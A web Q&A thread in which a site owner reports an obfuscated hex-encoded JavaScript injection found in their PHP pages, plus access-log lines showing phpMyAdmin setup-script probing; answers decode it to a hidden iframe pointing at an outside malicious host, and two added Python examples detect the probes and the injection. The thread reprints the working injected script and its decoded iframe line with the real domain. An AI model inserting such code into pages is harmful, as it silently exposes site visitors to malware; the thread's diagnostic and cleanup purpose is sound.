2011-07-19 28 views
0

One day the Q&A part of my website stopped working, so I opened the index and found the error was a syntax error. So I wiped it out and took it down. However, when I opened it up I found this: is this a possible hack?

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>httpdocs/');<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script> 

I later found it on several PHP sites (such as a WordPress index), and what I want to know is whether anyone knows where it comes from and what its purpose is.

I also found this in my logs, and it looks suspicious:

87.106.166.95 - - [19/Jul/2011:00:03:14 +0400] "GET //typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:15 +0400] "GET //phpadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:16 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:17 +0400] "GET //phpmyadmin1/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //phpmyadmin2/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:18 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:19 +0400] "GET //web/phpMyAdmin/scripts/setup.php  HTTP/1.1" 301 550 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //xampp/phpmyadmin/scripts/setup.php HTTP/1.1" 301 552 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:20 +0400] "GET //web/scripts/setup.php HTTP/1.1" 301 539 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:21 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:22 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:23 +0400] "GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //php-my-admin/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:24 +0400] "GET //sqlmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:25 +0400] "GET //mysqlmanager/scripts/setup.php HTTP/1.1" 301 548 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //p/m/a/scripts/setup.php HTTP/1.1" 301 541 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:26 +0400] "GET //PMA2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:27 +0400] "GET //pma2005/scripts/setup.php HTTP/1.1" 301 543 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //phpmanager/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:28 +0400] "GET //php-myadmin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:29 +0400] "GET //phpmy-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //webadmin/scripts/setup.php HTTP/1.1" 301 544 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:30 +0400] "GET //sqlweb/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:31 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //webdb/scripts/setup.php HTTP/1.1" 301 541 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:32 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //mysql-admin/scripts/setup.php HTTP/1.1" 301 547 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:33 +0400] "GET //databaseadmin/scripts/setup.php HTTP/1.1" 301 549 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:34 +0400] "GET //admm/scripts/setup.php HTTP/1.1" 301 540 "-" "-" 
87.106.166.95 - - [19/Jul/2011:00:03:35 +0400] "GET //admn/scripts/setup.php HTTP/1.1" 301 540 "-" "-" 
+0

Thanks for the replies –
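The log excerpt above shows one client walking through dozens of guessed phpMyAdmin paths for `scripts/setup.php` within a few seconds. As an added example (not from the question or any answer), here is a small detector that parses lines in that combined-log format, groups probes by client IP, and flags any IP hitting the setup script under several distinct directories inside a short window; it also reports whether any probe returned 200, which is the case that would actually need follow-up. The sample lines are constructed with documentation IPs, not copied from the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# The phpMyAdmin setup script that the scanner in the question was hunting for.
PROBE_RE = re.compile(r'/scripts/setup\.php$', re.IGNORECASE)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # malformed or non-standard line: skip rather than crash
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts, "path": m.group("path"),
            "status": int(m.group("status"))}

def find_setup_probes(lines, min_paths=5, window_seconds=60):
    """Flag IPs that request setup.php under >= min_paths distinct directories
    within window_seconds. any_200 tells you whether a probe actually hit a file."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and PROBE_RE.search(rec["path"]):
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):
            window = [r for r in recs[i:]
                      if (r["ts"] - first["ts"]).total_seconds() <= window_seconds]
            paths = {r["path"].lower() for r in window}  # case-variants count once
            if len(paths) >= min_paths:
                flagged[ip] = {"hits": len(recs), "distinct_paths": len(paths),
                               "any_200": any(r["status"] == 200 for r in recs)}
                break
    return flagged

# Constructed sample lines in the same format as the question's log (documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jul/2011:00:03:14 +0400] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "-"',
    '203.0.113.7 - - [19/Jul/2011:00:03:15 +0400] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"',
    '203.0.113.7 - - [19/Jul/2011:00:03:16 +0400] "GET //pma/scripts/setup.php HTTP/1.1" 301 539 "-" "-"',
    '203.0.113.7 - - [19/Jul/2011:00:03:17 +0400] "GET //xampp/phpmyadmin/scripts/setup.php  HTTP/1.1" 301 552 "-" "-"',
    '203.0.113.7 - - [19/Jul/2011:00:03:18 +0400] "GET //websql/scripts/setup.php HTTP/1.1" 301 542 "-" "-"',
    '203.0.113.7 - - [19/Jul/2011:00:03:19 +0400] "GET //mysqladmin/scripts/setup.php HTTP/1.1" 301 546 "-" "-"',
    '198.51.100.9 - - [19/Jul/2011:00:05:02 +0400] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 474 "-" "Mozilla/5.0"',
]
```

Feed it `open("access.log")` instead of `SAMPLE_LOG` to run it over a real log; a flagged IP with `any_200` set deserves a look at what that path serves.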

Answers

5

Yes, that looks like a common way of obfuscating malicious code once your site has been hacked. It can do many things, and often links back to a central server so that its subsequent behaviour can be modified.

To determine what this code does, we just need to run it with console.log substituted for eval. That prints out

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') 

The site's URL and content are an attempt to disguise its purpose. The page it currently serves is further obfuscated. I have expanded the code here. It appears to look at your browser and plugin versions in order to target the virus at your visitors.

There are many crawlers on the web looking for vulnerable software versions and hacking in automatically. Trying to track them down is usually neither simple nor productive; just focus on being more secure next time.
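The answer's approach (swap eval for console.log) still runs attacker JavaScript in a browser. As an added example that is not from this answer's author, the following does the same decoding statically: it reproduces the hex-pair-to-character loop without eval(), pulls the iframe target out of the decoded string, and walks a document root to report every file carrying the same injection pattern. The sample file is constructed with a reserved test domain; `scan_tree` and the other names are this example's own.

```python
import os
import re

# Shape of the injected snippet in the question: a hex string in `arr`, decoded
# two characters at a time with String.fromCharCode, then handed to eval().
INJECT_RE = re.compile(
    r'<script>var t="";var arr="([0-9a-fA-F]+)";.*?eval\(t\);</script>', re.DOTALL)
IFRAME_SRC_RE = re.compile(r'<iframe\s[^>]*src="([^"]+)"', re.IGNORECASE)

def decode_hex_payload(hex_str):
    """Do what the JS loop does, minus eval(): each hex pair becomes one character."""
    if len(hex_str) % 2:
        raise ValueError("odd-length hex payload, not the expected pair encoding")
    return bytes.fromhex(hex_str).decode("latin-1")

def find_injections(content):
    """Return one finding per injected <script>, with the decoded JS and iframe targets."""
    findings = []
    for m in INJECT_RE.finditer(content):
        decoded = decode_hex_payload(m.group(1))
        findings.append({"offset": m.start(), "decoded": decoded,
                         "iframe_src": IFRAME_SRC_RE.findall(decoded)})
    return findings

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a document root and report every file carrying the injection."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample (not the page's real payload): same wrapper, reserved test domain.
SAMPLE_JS = ('document.write(\'<iframe src="http://malware.example.invalid/forum.php?tp=TEST" '
             'width="1" height="1" frameborder="0"></iframe>\')')
SAMPLE_FILE = ('<?php echo "hello"; ?>\n<script>var t="";var arr="' + SAMPLE_JS.encode().hex()
               + '";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));'
               'eval(t);</script>\n')

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_FILE):
        print(hit["iframe_src"], hit["decoded"])
```

Running `scan_tree("/path/to/httpdocs")` lists every infected file with its decoded payload, which tells you which sites on the server were touched, not just the one you noticed.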

0

It comes from hackers.

Its purpose is to hack you.

Remove it, and upgrade your defences.

+0

I don't know where it came from, since the possible scripts are ECHP, WordPress or Question2Answer –

+0

@Travis: protect all of them. –

+0

Work in progress. –

0

Yes, someone got access and inserted that. It's encrypted JavaScript that modifies the page. An easy way to find out what actually happens is to replace eval() with console.log() or alert(), which will give you the code.

I did that, and this is the code it adds to the page:

<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe> 
0

This is code that was injected into these sites through a vulnerability in WordPress, a plugin, or some other application running on the server.

The code, when de-obfuscated by changing eval to console.log, yields:

document.write('<iframe src="http://xxx/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>')

(I have edited the domain for safety ;-)

0

, you

document.write('<iframe src="http://americanmobile.ca/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') 

That forum post has since been removed, so it won't actually do anything now, but you have been hacked.